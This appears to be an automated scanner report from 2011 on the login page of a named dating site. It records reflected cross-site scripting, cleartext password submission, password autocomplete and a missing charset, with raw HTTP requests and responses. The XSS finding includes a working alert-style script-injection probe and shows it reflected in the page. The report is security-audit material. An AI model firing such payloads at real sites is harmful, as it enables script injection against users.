1. Cross-site scripting (reflected)
2. Cleartext submission of password
3. Password field with autocomplete enabled
4. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://www1.xxxmatch.com |
Path: | /login |
GET /login?75d20"><script>alert(1)< Host: www1.xxxmatch.com Proxy-Connection: keep-alive Referer: http://www.xxxmatch.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: referral_path=%2F63790 |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 20:15:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 8084 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA-C ...[SNIP]... <input type="hidden" name="75d20"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www1.xxxmatch.com |
Path: | /login |
GET /login HTTP/1.1 Host: www1.xxxmatch.com Proxy-Connection: keep-alive Referer: http://www.xxxmatch.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: referral_path=%2F63790 |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 20:15:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 7998 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA-C ...[SNIP]... </p> <form id="frm_login" name="frm_login" method="post" action="http://www1 <div class="full"> ...[SNIP]... <div class="fL top nothing"> <input name="password" type="password" class="f12 cDKgrey full" id="pwd_password" /> </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www1.xxxmatch.com |
Path: | /login |
GET /login HTTP/1.1 Host: www1.xxxmatch.com Proxy-Connection: keep-alive Referer: http://www.xxxmatch.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: referral_path=%2F63790 |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 20:15:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 7998 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA-C ...[SNIP]... </p> <form id="frm_login" name="frm_login" method="post" action="http://www1 <div class="full"> ...[SNIP]... <div class="fL top nothing"> <input name="password" type="password" class="f12 cDKgrey full" id="pwd_password" /> </div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www1.xxxmatch.com |
Path: | /login |
GET /login HTTP/1.1 Host: www1.xxxmatch.com Proxy-Connection: keep-alive Referer: http://www.xxxmatch.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: referral_path=%2F63790 |
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 20:15:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 7998 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA-C ...[SNIP]... |